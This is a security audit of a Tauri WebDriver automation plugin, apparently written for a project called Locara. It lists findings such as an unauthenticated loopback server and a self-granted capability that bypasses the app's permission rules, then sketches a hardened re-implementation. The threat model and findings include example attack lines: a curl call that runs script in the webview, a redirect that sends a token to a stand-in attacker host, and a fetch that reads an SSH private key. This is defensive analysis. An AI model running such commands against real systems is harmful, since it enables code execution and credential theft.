Locara

tauri-webdriver-automation (danielraffel) — Security Audit

What it is: Community Tauri 2 plugin that exposes a WebDriver-shaped HTTP server inside a debug-built Tauri app on macOS, plus a CLI (tauri-wd) that translates W3C WebDriver requests into the plugin’s protocol, plus an MCP server (mcp-tauri-automation) that lets agents drive the whole thing through a model. Status: Live as of 2026-02. Small project (1 author, 16 stars, ~2 kLOC Rust, ~1.7 kLOC TS). Last commit on main: 2026-02-17. Most relevant to Locara: It’s the only thing on the planet today that solves agent-driven Tauri testing on Apple Silicon — but it ships several patterns that conflict with Locara’s security stance. Audit verdict: re-implement, don’t vendor.

This note records the audit findings against the methodology. Audited commit: main HEAD as of 2026-05-07.

Plugin facts

FieldValue
Repohttps://github.com/danielraffel/tauri-webdriver
LicenseMIT OR Apache-2.0 (vendor-OK)
LOCplugin lib.rs 92 + server.rs 1804 + init.js ~135 ≈ 2030 LOC; CLI main.rs 1768
Crate version0.1.3
Last commit (main)2026-02-17 (≈2.5 months stale)
Open issues4 (incl. #4 — PoisonError self-termination on macOS)
Stars / forks16 / 2
Plugin direct depsaxum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2 (wry, dynamic-acl)
Bus factor1 (@danielraffel, AI-assisted per the README)
Companion MCPdanielraffel/mcp-tauri-automation — TS, MIT, fork of Radek44/mcp-tauri-automation, last push 2026-02-14

TL;DR

Re-implement, don’t vendor. Three load-bearing problems:

  1. The HTTP server is unauthenticated on a loopback TCP port — any local process gets RCE in the webview.
  2. The plugin bypasses the host app’s capability ACL by calling app.add_capability(...) at runtime with window("*") + remote http://*/https://* globs.
  3. The “debug-only” promise is a README convention, not a code-level kill-switch — there’s no #[cfg(not(debug_assertions))] compile_error!, so a release build accidentally including the dependency ships an open WebDriver server.

The agent-useful subset (click, type, eval, screenshot, invoke) is well under 500 LOC of axum + WebviewWindow::eval. Vendoring the upstream would inherit all three problems plus the v0.1.3 PoisonError reliability bug. We rebuild on Locara’s terms — Unix-socket transport, bearer-token auth, compile-time release-build guard, capability integration that respects the manifest, structured audit log.

Threat model — what an attacker can do

Against tauri-webdriver-automation running in a typical Tauri 2 dev environment:

Same-machine, different-processCritical. Any local process running as the user (a malicious npm postinstall, a compromised VS Code extension, a Mac-malware sample) can curl -X POST http://127.0.0.1:<port>/script/execute -d '{"script":"...","args":[]}' and run arbitrary JS in your dev app’s webview. That JS can:

  • Read DOM and exfil to the network (fetch).
  • Call any Tauri command via window.__TAURI_INTERNALS__.invoke — the plugin’s runtime ACL bypass means window("*") is allowed, so even non-debug commands are reachable.
  • Read file:// URLs if the host app’s app.security.assetProtocol allows it (default Tauri is restrictive but plugins commonly loosen this).

The port is broadcast on stdout (server.rs:1798println!("[webdriver] listening on port {}", port)); anything that captures the dev binary’s stdout (CI log uploads, screen-share, parent-process tee) leaks the port. Even without that leak, the loopback port range is ~64 k — scannable in seconds.

Same-LAN, browser tab → Probably blocked, but only by the browser. A page on a coffee-shop network can’t reach 127.0.0.1 directly, but DNS rebinding against localhost:<port> is a known bypass. The plugin sets no CORS headers and doesn’t validate Host or Origin. The plugin uses application/json POSTs which trigger preflight, and the missing Access-Control-Allow-Origin causes the preflight to fail in a normal browser — so a naive browser-tab attack fails, but it fails outside the plugin in CORS, not inside the plugin’s code. Native helpers, browser extensions with <all_urls> permission, and non-browser HTTP clients have no such mitigation.

Same-LAN, native client → No direct exposure. TcpListener::bind("127.0.0.1:0") doesn’t accept off-host connections.

Production-build accidentCritical. If a downstream user adds the crate to [dependencies] (not [target.'cfg(debug_assertions)'.dependencies]) and forgets the wrap in main.rs, the release build ships a fully open WebDriver server. There is no compile-time, no env-var, no runtime check inside the plugin to prevent this.

Findings

F1 — Loopback HTTP server is unauthenticated

server.rs:1795tokio::net::TcpListener::bind("127.0.0.1:0"). No bearer token, no shared secret, no Unix-socket peer credentials, no Authorization header check, no rate limit. Routes are bare POST /script/execute, POST /navigate/url, POST /cookie/add, etc.

Attacker class: same-machine. Severity: Critical. Mitigation if vendoring: require an Authorization: Bearer <token> header with a 32-byte random token generated at boot, written to a 0600-mode file in $XDG_RUNTIME_DIR. Better: drop TCP entirely, switch to a Unix domain socket with peer-credential check (SO_PEERCRED on Linux, LOCAL_PEERCRED on macOS).

F2 — #[cfg(debug_assertions)] is a README convention, not enforced in code

lib.rs::init() has zero cfg gates. The plugin will happily start the server in a release binary. The protection — wrapping app.plugin(tauri_plugin_webdriver_automation::init())? in #[cfg(debug_assertions)] — has to happen at the call site, in the consumer’s main.rs, where it is one missed wrap away from shipping.

Attacker class: production-build accident. Severity: Critical. Mitigation if re-implementing:

// crates/locara-automation/src/lib.rs (top of file)
#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds. \
                Gate the dependency in Cargo.toml under \
                [target.'cfg(debug_assertions)'.dependencies] or enable the \
                explicit `force-enable-automation` feature flag.");

Plus a runtime check on LOCARA_AUTOMATION=1. If unset, the plugin’s init() returns success but never opens the surface. Defense in depth: the build fails and the runtime refuses to start.

F3 — Plugin self-grants a permissive capability that overrides tauri.conf.json

lib.rs:60-66:

app.add_capability(
    tauri::ipc::CapabilityBuilder::new("webdriver-automation")
        .local(true)
        .window("*")
        .remote("http://*".into())
        .remote("https://*".into())
        .permission("webdriver-automation:default"),
)?;

window("*") allows any window. The two remote("http://*") / remote("https://*") globs allow any http/https origin loaded into a webview to call plugin:webdriver-automation|resolve. The resolve callback is invoked from the plugin’s own injected init.js, not from remote pages, so the remote globs are gratuitous — they only expand the IPC attack surface.

Attacker class: any page loaded into the webview (in scope for apps that allow remote content). Severity: High. Mitigation if re-implementing: ship a permissions/automation.toml and require the host app to opt in via its own tauri.conf.json capability allowlist. Tighten window scope to a specific automation window label. Drop the .remote() globs entirely.

F4 — script_execute is a thin shell over webview eval

server.rs:755-765 — request body’s script is wrapped into (function(){ ... }).apply(null, __args) and passed straight to WebviewWindow::eval. No allowlist, no sandboxing, no audit log of what JS ran.

This is by design — it’s the agent surface — but combined with F1, anyone speaking to the loopback port can do anything the page can.

Attacker class: same-machine (gated by F1 if F1 is fixed). Severity: High (as a primitive). Acceptable if and only if F1 is mitigated and an audit log is added. Mitigation if re-implementing: keep the eval primitive (we need it), but wrap it in:

  • bearer-token / unix-socket auth (closes F1),
  • structured append-only audit log (timestamp, route, caller PID via SO_PEERCRED, body hash, response shape),
  • compile-time release-build kill-switch (closes F2).

F5 — navigate_url accepts arbitrary URLs

server.rs:834+ — driver can drive the webview to any URL. Combined with F1, an attacker can pivot the webview to https://attacker.example/exfil?token=... carrying the user’s session.

Attacker class: same-machine. Severity: Medium (high if combined with F1 unfixed). Mitigation: allowlist the navigation targets to tauri://, data:, and explicitly-permitted origins.

F6 — fetch('file://...') gated only by WKWebView config

The plugin doesn’t tighten app.security.assetProtocol. If the host app loosens it for asset loading, the WebDriver caller can read arbitrary files via fetch('file:///Users/you/.ssh/id_rsa').

Attacker class: same-machine (same as F1). Severity: High (in apps that allow file:); inert otherwise. Mitigation if re-implementing: require strict assetProtocol and dangerousDisableAssetCspModification = false whenever automation is enabled; refuse to start otherwise.

F7 — expect/unwrap-heavy mutex locking

server.rs and lib.rs use .lock().expect("...") extensively (pending_scripts, frame_stack, current_window_label). Issue #4 confirms a PoisonError self-terminates tauri-wd on macOS in v0.1.3 after a few sequential tests.

Attacker class: none directly — but reliability bugs of this shape are the difference between “tests pass once then deadlock” and “tests are dependable.” Severity: Medium (reliability). Mitigation if re-implementing: RwLock over Mutex where possible, try_lock()-with-recovery on critical paths, structured panic-to-error conversion at task boundaries. Replace every .expect("lock poisoned") with let Ok(g) = m.lock() else { return ServerError::Poisoned; }.

F8 — Stdout port disclosure

server.rs:1798println!("[webdriver] listening on port {}", port);. Anything reading the binary’s stdout (CI log uploads, tee’d dev terminals, screen-share, parent-process capture) leaks the port. With F1 unfixed, this is a one-shot RCE for any process that captured a CI log.

Attacker class: same-machine + log-leak. Severity: Low alone, High when combined with F1. Mitigation if re-implementing: Unix socket eliminates the port. Token (if we still expose one) goes to a 0600-mode file readable only by the same UID, never to stdout.

F9 — tauri-wd CLI launches arbitrary binaries

main.rs:319tokio::process::Command::new(&binary) where binary comes from W3C session capabilities tauri:options.binary. Anyone speaking to the CLI on :4444 can execute any binary on disk.

Attacker class: same-machine (against the test runner, not the plugin). Severity: High if we ship the MCP companion. Inert if we don’t. Decision: don’t ship the MCP companion. Locara’s automation is wired directly into the locara CLI; we don’t need a separate WebDriver-shaped CLI.

F10 — Dependency surface is clean (positive finding)

axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2. All actively maintained, no yanked versions, no open cargo audit advisories of note. No unsafe in plugin source. No supply-chain finding. The risk is in the plugin’s own design, not its deps.

What the plugin gets right (worth porting)

  • __WEBDRIVER__ JS bridge patternjs_init_script injects a small client-side helper that exposes window.__WEBDRIVER__.resolve(id, value) → a tokio::sync::oneshot on the Rust side. Clean, low-overhead, parameter-safe (the script body is the only stringy bit). Rename to __LOCARA__ for ours.
  • pending_scripts: Mutex<HashMap<id, oneshot::Sender>> lifecycle — request comes in, generates UUID, writes to map, eval’s the script with the UUID, JS resolves with the UUID, Rust pulls the sender from the map and replies. Replace expect() with poisoned-recovery; otherwise port intact.
  • on_webview_ready broadcast — start the automation server only after at least one webview exists, so eval always has somewhere to land. Useful pattern.
  • Single-binary debug-only philosophy — the intent is right; we just enforce it in code instead of README.

Re-implementation sketch — crates/locara-automation

Target: <500 LOC Rust + ~80 LOC JS. Zero new top-level transitive crates beyond what Locara already pulls in (axum, tokio, serde, serde_json, tauri, uuid, tracing).

crates/locara-automation/
  Cargo.toml                        # debug-only feature, version pinned to workspace
  permissions/
    automation.toml                 # opt-in capability, host-app declares
    default.toml                    # the single permission `automation:resolve`
  src/
    lib.rs                          # plugin entry, compile-time guard, capability registration
    server.rs                       # axum router on a Unix socket, ~250 LOC
    auth.rs                         # bearer-token middleware, token file lifecycle
    audit.rs                        # append-only JSONL log, ~80 LOC
    init.js                         # __LOCARA__ bridge, mirror of init.js

Transport: tokio::net::UnixListener::bind("$XDG_RUNTIME_DIR/locara-automation-<pid>.sock") with 0o600. Closes F1, F8 in one move.

Auth: ephemeral 32-byte bearer token, written to $XDG_RUNTIME_DIR/locara-automation-<pid>.token mode 0o600. The Locara CLI reads the path from $XDG_RUNTIME_DIR (or from a structured handshake message on the socket itself), never from stdout.

Compile-time guard (F2):

#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds");

Runtime guard: init() checks LOCARA_AUTOMATION=1; if unset, returns Ok without starting the server. The Locara CLI sets this when it spawns the dev shell.

Capability integration (F3): never call add_capability at runtime. Ship permissions/automation.toml; require the consumer to add automation:default to their own capability allowlist. Locara apps already have capability declarations in their manifests — this is the same path.

IPC shape (six routes, agent-useful subset):

POST /eval         { window, script }              → { value }
POST /click        { window, selector, index }     → { ok }
POST /type         { window, selector, text }      → { ok }
POST /screenshot   { window }                      → { png_b64 }
POST /invoke       { window, command, payload }    → { value }
POST /navigate     { window, url }                 → { ok }

That’s it. No frames, no shadow DOM, no cookies, no alerts. Add when an actual recipe needs it.

Lifecycle: start the server in setup() after on_webview_ready. Store the JoinHandle in plugin state. Abort on RunEvent::Exit. Refuse to start if a sibling locara-automation-*.sock already exists for the same UID + bundle ID (prevents accidental double-launch attacks).

Audit log (mandatory): every request writes a line to ~/Library/Logs/Locara/automation-<date>.jsonl:

{"ts":"2026-05-07T19:14:22Z","route":"/eval","caller_pid":12345,"caller_uid":501,"body_sha256":"…","response_shape":"value","ms":14}

Append-only, log-rotated daily.

Mutex discipline (F7): RwLock for read-mostly state (the pending_scripts map). try_lock + structured error on contention. Every panic at a task boundary is converted to a 500 Internal Error in the response, never propagates.

Closes F4-F6, F8-F9 by construction: F4 (eval surface) is wrapped by F1+F2 mitigations and the audit log. F5 (navigate) is allowlisted. F6 (file://) is precondition-checked at startup. F8 (stdout) is gone — Unix socket. F9 (CLI binary launching) is out of scope — we don’t ship the WebDriver CLI.

Effort: 1-2 days of focused work for the plugin + a Bun runner that talks to the socket. Recipes from tools/probe-ui port nearly unchanged because they already use the Probe handle abstraction; a thin adapter from Probe → automation-socket replaces the Playwright bits.

Specific learnings for Locara

  1. The fact that an unauthenticated, ACL-bypassing, README-gated WebDriver plugin is the best available option for agent-driven Tauri testing on macOS is itself a useful signal. The space is wide open. Locara should treat agent-driven E2E as a product feature, not a third-party dependency. Owning the surface is consistent with our security positioning and removes a long-term supply-chain risk.

  2. Patterns to copy from upstream: js_init_script + oneshot::channel resolve mechanism, on_webview_ready broadcast, request-id-routed scripts. These are well-shaped.

  3. Patterns to discard: TCP-bind, runtime add_capability, README-only cfg gating, port disclosure on stdout, expect()-heavy mutex locking, MCP companion binary launcher.

  4. Defense in depth means three layers: (a) compile-time compile_error! blocks release builds, (b) runtime env-var gate refuses to open the surface, (c) Unix socket + bearer token blocks anything that gets past (a) and (b).

  5. Audit logs aren’t optional for RCE-shape primitives. A surface that can eval JS in a webview must have a structured, append-only, on-disk record of every call. The reason isn’t blame — it’s that when something goes wrong, you need the data.

  6. Re-implementation cost is small (~500 LOC). Less than the audit cost of vendoring upstream and maintaining a security-fixed fork over time. The decision is structural, not heroic.

  7. tauri-driver (official) and CrabNebula’s @crabnebula/tauri-driver are also options — official is [Todo] on macOS so a non-starter today; CrabNebula is paywalled for macOS. Build our own.

  8. Update notes/tauri.md cross-reference when this lands: Locara’s testing primitive is a Tauri plugin, not a third-party tool. Same trust boundary.

References